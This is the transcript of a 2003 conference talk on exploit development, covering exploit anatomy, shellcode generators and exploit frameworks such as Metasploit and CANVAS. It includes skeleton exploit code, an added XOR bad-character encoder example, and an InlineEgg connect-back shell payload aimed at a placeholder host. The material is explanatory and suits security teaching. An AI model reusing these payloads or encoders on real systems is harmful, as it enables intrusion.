Advanced Exploit Development
Transcript of Advanced Exploit Development
1
Hack in the Box 2003
Advanced Exploit Development
Trends and Tools
H D Moore
2
Who
Who am I?
Co-founder of Digital Defense
Security researcher (5+ years)
Projects
DigitalOffense.net
Metasploit.com
3
What
What is this about?
1. Exploit Trends
2. Anatomy of an Exploit
3. Common Exploit Problems
4. Payload Generators
5. Exploit Frameworks
6. Metasploit v2.0 Demo!
4
Why
Why should you see this?
Exploit basics and challenges
Recent trends and advances
New shellcode generation tools
Review of exploit frameworks
Exclusive look at Metasploit v2.0
5
Hack in the Box 2003
Exploit Trends
6
#1: Exploit Trends
More Exploit Writers
Information reached critical mass
Huge exploit devel community
Improved Techniques
No more local brute force
4 Bytes: GOT, SEH, PEB
7
#1: Exploit Trends
Reliable Exploit Code
Universal win32 addresses
Allocation control techniques
Where Does This Lead?
Shrinking exploit timeline
Exploit tools and frameworks
8
Hack in the Box 2003
Anatomy of an Exploit
9
#2: Anatomy of an Exploit
Exploit Components
Target and option selection
Network and protocol code
Payload or “shellcode”
Payload encoding routine
Exploit request builder
Payload handler routine
10
#2: Anatomy of an Exploit
Target and option selection
List of addresses and offsets
Process user selected target
Process other exploit options
This adds up to a lot of code...
11
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```shell
./exp -h 1.2.3.4 -p 21 -t 0
```
Parsing command options...
12
#2: Anatomy of an Exploit
Network and protocol code
Resolve the target address
Create the appropriate socket
Connect the socket if needed
Perform any error handling
Start protocol negotiation
13
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```c
gethostbyname(sockaddr);
socket(AF_INET, ...);
connect(s, &sockaddr, 16);
ftp_login(s, user, pass);
```
Connecting to target...
Network Conn
14
#2: Anatomy of an Exploit
Payload or “shellcode”
Executes when exploit works
Bindshell, Findsock, Adduser
Normally written in assembly
Stored in code as binary string
Configuration done via offsets
15
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```c
shellcodes[0] = "\xeb...";
scode = shellcodes[target];
scode[PORT] = htons(...);
```
Setting target...
Network Conn
Payload
16
#2: Anatomy of an Exploit
Payload encoding routine
Most exploits restrict characters
Encoder must filter these chars
Standard type is XOR decode
Often just pre-encode payload
Payload options also encoded
17
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```c
for (x = 0; x < sizeof(scode); x++)
    scode[x] ^= 0x99;
```
Encoding shellcode...
Network Conn
Payload
Payload Encoder
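As an added example (not code from the talk or from Metasploit), the single-key XOR loop on this slide extended into an encoder that searches for a key keeping every encoded byte out of a restricted-character set, and reports when no key works; the sample payload bytes and the bad-character set are constructed for the demo. From the detection side this is also why a signature on the raw payload bytes will not match the wire form: only the decoder loop and its key stay constant.

```python
from typing import FrozenSet, Optional, Tuple

# Constructed sample payload for the demo (not real shellcode). It contains
# 0x00 and 0x0a, which string-based protocol parsers will usually not carry.
SAMPLE_PAYLOAD = bytes([0x31, 0xc0, 0x00, 0x0a, 0x99, 0x41, 0x2f, 0x2f, 0x73, 0x68])

# Constructed restricted set: NUL, LF and CR, the usual casualties of
# strcpy()-style copies and line-oriented protocols.
BAD_CHARS: FrozenSet[int] = frozenset({0x00, 0x0a, 0x0d})


def find_xor_key(payload: bytes, bad: FrozenSet[int]) -> Optional[int]:
    """Return a one-byte key k such that no byte of payload XOR k lands in
    `bad`, or None when no single-byte key can clean this payload."""
    for key in range(1, 256):
        # The key is embedded in the decoder stub, so it must be clean itself.
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in payload):
            return key
    return None


def xor_encode(payload: bytes, bad: FrozenSet[int]) -> Tuple[int, bytes]:
    """Encode with the first usable key; raise if the restricted set is too
    dense for single-byte XOR (the exploit then needs a different encoder)."""
    key = find_xor_key(payload, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the restricted set")
    return key, bytes(b ^ key for b in payload)


def xor_decode(key: int, encoded: bytes) -> bytes:
    """The slide's loop, scode[x] ^= key, run in the other direction; in an
    exploit this is a few bytes of machine code placed before the payload."""
    return bytes(b ^ key for b in encoded)


def has_bad_chars(data: bytes, bad: FrozenSet[int]) -> bool:
    """Check a wire buffer the way a careful author (or a test harness)
    would before sending it."""
    return any(b in bad for b in data)


if __name__ == "__main__":
    key, enc = xor_encode(SAMPLE_PAYLOAD, BAD_CHARS)
    print(f"key=0x{key:02x} encoded={enc.hex()} clean={not has_bad_chars(enc, BAD_CHARS)}")
    assert xor_decode(key, enc) == SAMPLE_PAYLOAD
```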
18
#2: Anatomy of an Exploit
Exploit request builder
Code which triggers the vuln
Ranges from simple to complex
Can require various calculations
Normally just string mangling
Scripting languages excel at this
19
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```c
buf = web_request("/cgi-bin...");
memcpy(buf + 100, scode, ...);
buf[480] = (char *) retaddr;
send(s, buf, strlen(buf));
```
Sending exploit request...
Network Conn
Payload
Payload Encoder
Exploit Request
Payload
20
#2: Anatomy of an Exploit
Payload handler routine
Each payload needs a handler
Often just connects to bindshell
Reverse connect needs listener
Connects console to socket
Account for large chunk of code
21
#2: Anatomy of an Exploit
Process Options
Target System (IP: 1.2.3.4, OS: Linux)
```c
b = socket(AF_INET, ...);
connect(b, &sockaddr, 16);
handle_shell(b);
```
Dropping to shell...
```
sh-2.04# id
uid=0(root) gid=0(root)...
```
Network Conn
Payload
Payload Encoder
Exploit Request
Payload Handler
Bind Shell Payload
22
Hack in the Box 2003
Common Exploit Problems
23
#3: Common Exploit Problems
Exploit code is rushed
Robust code takes time
Coders race to be the first
Old exploits are less useful
Result: lots of broken code
24
#3: Common Exploit Problems
Exploiting Complex Protocols
RPC, SSH, SSL, SMB
Exploit depends on API
Exploit supplied as patch
Restricts exploit environment
Requires old software archive
25
#3: Common Exploit Problems
Limited Target Sets
One-shot vulnerabilities suck
Always limited testing resources
Finding target values takes time
26
#3: Common Exploit Problems
Payload Issues
Most hardcode payloads
Firewalls can block bind shells
Custom config breaks exploit
No standard payload library
27
Hack in the Box 2003
Payload Generators
28
#4: Payload Generators
Generator Basics
Dynamic payload creation
Use a high-level language
Useful for custom situations
29
#4: Payload Generators
Many Generator Projects
Only a few are usable
Spawned from frameworks
Impressive capabilities so far
30
#4: Payload Generators
Impurity (Alexander Cuttergo)
Shellcode downloads to memory
Executable is statically linked C
Allows library functions
No filesystem access required
Supports Linux on x86
31
#4: Payload Generators
32
#4: Payload Generators
Shellforge (Philippe Biondi)
Transforms C to payload
Uses GCC and python
Includes helper API
Simple and usable
33
#4: Payload Generators
Shellforge Example:
```c
#include "include/sfsyscall.h"   /* Shellforge syscall wrappers: write(), exit() */

int main(void)
{
    char buf[] = "Hello world!\n";
    write(1, buf, sizeof(buf) - 1);   /* -1: do not emit the trailing NUL */
    exit(0);
}
```
34
#4: Payload Generators
MOSDEF (Immunity Inc)
GPL spawn of CANVAS
Dynamic code via python
API loader via “import” tags
Compile, send, exec, return
Version 0.1 not ready to use
35
#4: Payload Generators
MOSDEF Example:
```c
#import "remote", "Kernel32._lcreat" as "_lcreat"
#import "string", "filename" as "filename"

// start of code
void main() {
    int i;
    i = _lcreat(filename, 0);   /* Win32 _lcreat(path, attribute): 0 = normal file */
    sendint(i, i);
}
```
36
#4: Payload Generators
InlineEgg (CORE SDI)
Spawn of CORE Impact
Dynamic code via python
Non-commercial use only
Supports Linux, BSD, Windows...
37
#4: Payload Generators
InlineEgg Example:
```python
# imports assumed from the InlineEgg distribution (InlineEgg, Linuxx86Syscall)
from inlineegg.inlineegg import *
import socket

# connect-back address and port: placeholder values, not from the slide
connect_addr = '192.0.2.1'
connect_port = 5555

egg = InlineEgg(Linuxx86Syscall)

# connect to other side
sock = egg.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = egg.save(sock)
egg.connect(sock, (connect_addr, connect_port))

# dup and exec
egg.dup2(sock, 0)
egg.dup2(sock, 1)
egg.dup2(sock, 2)
egg.execve('/bin/sh', ('bash', '-i'))
```
38
Hack in the Box 2003
Exploit Frameworks
39
#5: Exploit Frameworks
Framework Basics
Library of common routines
Simple to add new payloads
Minimize development time
Platform for new techniques
40
#5: Exploit Frameworks
Public Exploit Frameworks
Two stable commercial products
Handful of open source projects
New projects in stealth mode
41
#5: Exploit Frameworks
CORE Impact (CORE SDI)
Strong product, 2+ years old
Skilled development team
Massive number of exploits
Python and C++ (Windows)
Starts at $15,000 USD
42
#5: Exploit Frameworks
CORE Impact (CORE SDI)
Stable syscall proxy system
Full development platform
Discovery and probe modules
Macro function capabilities
Integrated XML reporting
43
#5: Exploit Frameworks
44
#5: Exploit Frameworks
Windows ASM Components
Solid design, great features
Includes skeleton and manager
Full source code is available
Written in C and ASM
Modular development system
45
#5: Exploit Frameworks
Windows ASM Components
Small first stage component
Installs payload over network
Avoid bytes with XOR encoder
Fork, Bind, Connect, Findsock
46
#5: Exploit Frameworks
47
#5: Exploit Frameworks
CANVAS (Immunity Inc)
New and gaining ground
Small set of reliable exploits
Includes non-public “0-day”
Supports Linux & Windows
Priced at $995 USD
48
#5: Exploit Frameworks
CANVAS (Immunity Inc)
Working syscall proxy system
Solid payload encoder system
Includes API for developers
Exploits Solaris, Linux, Windoze
Automatic SQL injection module
49
#5: Exploit Frameworks
50
#5: Exploit Frameworks
LibExploit (Simon Femerling)
New project, improving quickly
C library to simplify development
Includes two sample exploits
Currently supports Linux x86
Released as open source (GPL)
51
#5: Exploit Frameworks
LibExploit (Simon Femerling)
Includes ~30 stock payloads
Generate dynamic payloads
Can encode with ADMutate
Common networking API
Built-in exploit console
52
#5: Exploit Frameworks
53
#5: Exploit Frameworks
Metasploit Exploit Framework
Complete exploit environment
Small set of reliable exploits
Trivial to use new payloads
Handlers and callbacks
Full source code (OSS)
54
#5: Exploit Frameworks
Metasploit Exploit Framework
Modular and extensible API
Protocol modules and routines
Easy to add new interfaces
Designed to allow embedding
Very active development
55
#5: Exploit Frameworks
56
Hack in the Box 2003
Questions?
57
Hack in the Box 2003
Metasploit Framework Demonstration